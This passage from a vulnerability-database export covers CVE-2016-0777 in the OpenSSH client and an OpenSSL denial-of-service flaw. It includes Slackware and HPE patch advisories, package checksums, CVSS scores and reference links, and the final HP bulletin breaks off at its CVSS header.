-current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-7.1p2-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n856dd9c1b10641c282f30a34b7b63bea openssh-7.1p2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n80903b0829f0284d007e7a316f2ff2da openssh-7.1p2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n2095d1a304a94bab44993fdb7e0781c8 openssh-7.1p2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n5bf653d7f5b4a9426ff2c5888af99f00 openssh-7.1p2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n53e09b4371c045b9de1c86e0826324f9 openssh-7.1p2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\ncd0319ff3c574c50612d5ba2b38f2fdc openssh-7.1p2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n98cdc1d6ffea2a06d0c8013078681bff openssh-7.1p2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n2093f3e91a79e07f072c702a1704be73 openssh-7.1p2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd051d9f31cd380436ad01fa1641be1c7 openssh-7.1p2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nf1f81757431c3c836f06ce5d22e2d5de openssh-7.1p2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n70db20c5e4152bc9967b1e24cf91ed98 n/openssh-7.1p2-i586-1.txz\n\nSlackware x86_64 -current package:\ne13dc3da27f817bee693fbb907015817 n/openssh-7.1p2-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg openssh-7.1p2-i486-1_slack14.1.txz\n\nNext, restart the sshd daemon:\n# sh /etc/rc.d/rc.sshd restart\n\nThen before logging out, make sure that you still have remote access!\nSee the information about incompatible changes in OpenSSH 7.x above. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niEYEARECAAYFAlaYWioACgkQakRjwEAQIjOwpACfXviFRy4mQxr63HyYu9zLgZ+Z\ndVsAn0sLTJYcXuCSQYnXNp+FYuIKWjVh\n=dePf\n-----END PGP SIGNATURE-----\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c05247375\nVersion: 1\n\nHPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System\n(vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information,\nRemote Denial of Service (DoS), Remote Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-08-29\nLast Updated: 2016-08-29\n\nPotential Security Impact: Remote Denial of Service (DoS), Disclosure of\nInformation, Unauthorized Modification Of Information\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential vulnerabilities have been identified in the lighttpd and OpenSSH\nversion used in HPE Remote Device Access: Virtual Customer Access System\n(vCAS). These vulnerabilities could be exploited remotely resulting in\nunauthorized modification of information, denial of service (DoS), and\ndisclosure of information. \n\nReferences:\n\nCVE-2015-3200\nCVE-2016-0777\nCVE-2016-0778\nPSRT110211\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA\n8.1) and earlier. \n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2015-3200\n 5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n CVE-2016-0777\n 6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)\n\n CVE-2016-0778\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has made the following updates available to resolve the vulnerabilities\nin Remote Device Access: Virtual Customer Access System (vCAS)\n\nvCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and\nhp-rdacas-16.05-10482.ova. \n\nThe Oracle VirtualBox kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova\n\nThe VMware ESX(i) and VMware Player kit is available at:\nhttps://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova\n\nHISTORY\nVersion:1 (rev.1) - 29 August 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2016-0777" }, { "db": "CERT/CC", "id": "VU#456088" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" } ], "trust": 2.7 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-88287", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-88287" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0777", "trust": 3.6 }, { "db": "JUNIPER", "id": "JSA10734", "trust": 2.4 }, { "db": "BID", "id": "80695", "trust": 2.1 }, { "db": "PACKETSTORM", "id": "135273", "trust": 1.9 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/01/14/7", "trust": 1.8 }, { "db": "SECTRACK", "id": "1034671", "trust": 1.8 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.8 }, { "db": "CERT/CC", "id": "VU#456088", "trust": 1.5 }, { "db": "CNNVD", "id": "CNNVD-201601-249", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10774", "trust": 0.6 }, { "db": "BID", "id": "80698", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "135282", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "135259", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "135283", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135250", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135281", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135263", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-88287", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-0777", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138552", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-249" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "id": "VAR-201601-0029", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-88287" } ], "trust": 0.01 }, "last_update_date": "2024-07-23T19:54:41.157000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "OpenSSH Security vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=59596" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/05/juniper_patches_opensshs_roaming_bug_in_junos_os/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/01/14/openssh_is_wide_open_to_key_theft_thanks_to_roaming_flaw/" }, { "title": "Ubuntu Security Notice: openssh vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2869-1" }, { "title": "Debian CVElist Bug Report Logs: openssh-client: CVE-2016-0777", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5382b188b84b87a2670c7f1e661e15b8" }, { "title": "Debian Security Advisories: DSA-3446-1 openssh -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ae57bf01ef5062fb12be694f4a95eb69" }, { "title": "Red Hat: CVE-2016-0777", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-0777" }, { "title": "Amazon Linux AMI: ALAS-2016-638", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-638" }, { "title": "Symantec Security Advisories: SA109 : Multiple OpenSSH Vulnerabilities (January 2016)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=ef164fe57ef1d1217ba2dc664dcecce2" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83" }, { "title": "sshtron", "trust": 0.1, "url": "https://github.com/zachlatta/sshtron " }, { "title": "repassh", "trust": 0.1, "url": "https://github.com/dyuri/repassh " }, { "title": "docker-sshtron", "trust": 0.1, "url": "https://github.com/jaymoulin/docker-sshtron " }, { "title": "sshtron", "trust": 0.1, "url": "https://github.com/marcospedreiro/sshtron " }, { "title": "Linux_command_crash_course", "trust": 0.1, "url": "https://github.com/akshayprasad/linux_command_crash_course " }, { "title": "gameserverB", "trust": 0.1, "url": "https://github.com/jcdad3000/gameserverb " }, { "title": "GameServer", "trust": 0.1, "url": "https://github.com/jcdad3000/gameserver " }, { "title": "fabric2", "trust": 0.1, "url": "https://github.com/winstonn/fabric2 " }, { "title": "", "trust": 0.1, "url": "https://github.com/cpcloudnl/ssh-config " }, { "title": "puppet-module-ssh", "trust": 0.1, "url": "https://github.com/ghoneycutt/puppet-module-ssh " }, { "title": "nmap", "trust": 0.1, "url": "https://github.com/project7io/nmap " }, { "title": "DC-2-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-2-vulnhub-walkthrough " }, { "title": "DC-1-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/dc-1-vulnhub-walkthrough " }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "CNNVD", "id": "CNNVD-201601-249" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-200", "trust": 1.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88287" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "http://www.openssh.com/txt/release-7.1p2" }, { "trust": 2.4, "url": "http://www.securityfocus.com/bid/80695" }, { "trust": 2.4, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "trust": 2.4, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "trust": 2.4, "url": "http://www.debian.org/security/2016/dsa-3446" }, { "trust": 2.4, "url": "http://packetstormsecurity.com/files/135273/qualys-security-advisory-openssh-overflow-leak.html" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "trust": 1.8, "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05247375" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "trust": 1.8, "url": "https://support.apple.com/ht206167" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/176516.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176349.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175592.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/175676.html" }, { "trust": 1.8, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:07.openssh.asc" }, { "trust": 1.8, "url": "http://seclists.org/fulldisclosure/2016/jan/44" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201601-01" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1034671" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2869-1" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734" }, { "trust": 1.5, "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt" }, { "trust": 1.4, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.7/common/022_ssh.patch.sig" }, { "trust": 1.4, "url": "http://www.ubuntu.com/usn/usn-2869-1/" }, { "trust": 0.9, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0777" }, { "trust": 0.8, "url": "http://undeadly.org/cgi?action=article\u0026sid=20160114142733" }, { "trust": 0.8, "url": "https://github.com/openssh/openssh-portable/blob/8408218c1ca88cb17d15278174a24a94a6f65fe1/roaming_client.c#l70" }, { "trust": 0.8, "url": "https://isc.sans.edu/forums/diary/openssh+71p2+released+with+security+fix+for+cve20160777/20613/" }, { "trust": 0.8, "url": "https://access.redhat.com/articles/2123781" }, { "trust": 0.8, "url": "https://security-tracker.debian.org/tracker/cve-2016-0778" }, { "trust": 0.7, "url": "https://www.kb.cert.org/vuls/id/456088" }, { "trust": 0.7, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375" }, { "trust": 0.6, "url": "http://www.openssh.com" }, { "trust": 0.6, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.6, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss" }, { "trust": 0.6, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.8/common/010_ssh.patch.sig" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023271" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023319" }, { "trust": 0.6, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021138" }, { "trust": 0.6, "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc" }, { "trust": 0.6, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/44" }, { "trust": 0.6, "url": "https://rhn.redhat.com/errata/rhsa-2016-0043.html" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978487" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000044" }, { "trust": 0.6, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-001-openssh" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021109" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777" }, { "trust": 0.3, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:07.openssh.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975158" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10734" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/200.html" }, { "trust": 0.1, "url": "https://github.com/zachlatta/sshtron" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/msc06-c.+beware+of+compiler+optimizations" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/14.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem06-c.+ensure+that+sensitive+data+is+not+written+out+to+disk" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/244.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem03-c.+clear+sensitive+information+stored+in+reusable+resources" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.openssh.com/legacy.html" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0778" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3200" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-249" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88287" }, { "db": "VULMON", "id": "CVE-2016-0777" }, { "db": "BID", "id": "80698" }, { "db": "BID", "id": "80695" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-249" }, { "db": "NVD", "id": "CVE-2016-0777" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-14T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2016-01-14T00:00:00", "db": "VULHUB", "id": "VHN-88287" }, { "date": "2016-01-14T00:00:00", "db": "VULMON", "id": "CVE-2016-0777" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80698" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80695" }, { "date": "2016-01-15T02:09:54", "db": "PACKETSTORM", "id": "135273" }, { "date": "2016-01-15T00:03:14", "db": "PACKETSTORM", "id": "135259" }, { "date": "2016-01-15T13:35:04", "db": "PACKETSTORM", "id": "135282" }, { "date": "2016-08-30T14:19:12", "db": "PACKETSTORM", "id": "138552" }, { "date": "2016-01-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-249" }, { "date": "2016-01-14T22:59:01.140000", "db": "NVD", "id": "CVE-2016-0777" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-20T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-88287" }, { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2016-0777" }, { "date": "2017-01-23T03:06:00", "db": "BID", "id": "80698" }, { "date": "2017-01-23T04:05:00", "db": "BID", "id": "80695" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-249" }, { "date": "2022-12-13T12:15:18.887000", "db": "NVD", "id": "CVE-2016-0777" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-249" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSH Client contains a client information leak vulnerability and buffer overflow", "sources": [ { "db": "CERT/CC", "id": "VU#456088" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-249" } ], "trust": 0.6 } }
var-201201-0314
Vulnerability from variot
The Server Gated Cryptography (SGC) implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service (CPU consumption) via unspecified vectors. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03360041
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03360041 Version: 1
HPSBMU02786 SSRT100877 rev.1 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Unauthorized Access, Disclosure of Information, Data Modification, Denial of Service (DoS), Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2012-06-26 Last Updated: 2012-06-26
Potential Security Impact: Remote unauthorized access, disclosure of information, data modification, Denial of Service (DoS), execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in unauthorized access, disclosure of information, data modification, Denial of Service (DoS), and execution of arbitrary code.
References: CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3379, CVE-2011-3607, CVE-2011-4078, CVE-2011-4108, CVE-2011-4153, CVE-2011-4317, CVE-2011-4415, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2011-4885, CVE-2012-0021, CVE-2012-0027, CVE-2012-0031, CVE-2012-0036, CVE-2012-0053, CVE-2012-0057, CVE-2012-0830, CVE-2012-1165, CVE-2012-1823, CVE-2012-2012 (AUTOCOMPLETE enabled), CVE-2012-2013 (DoS), CVE-2012-2014 (Improper input validation), CVE-2012-2015 (Privilege Elevation), CVE-2012-2016 (Information disclosure), SSRT100336, SSRT100753, SSRT100669, SSRT100676, SSRT100695, SSRT100714, SSRT100760, SSRT100786, SSRT100787, SSRT100815, SSRT100840, SSRT100843, SSRT100869
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) before v7.1.1 running on Linux and Windows.
BACKGROUND
CVSS 2.0 Base Metrics
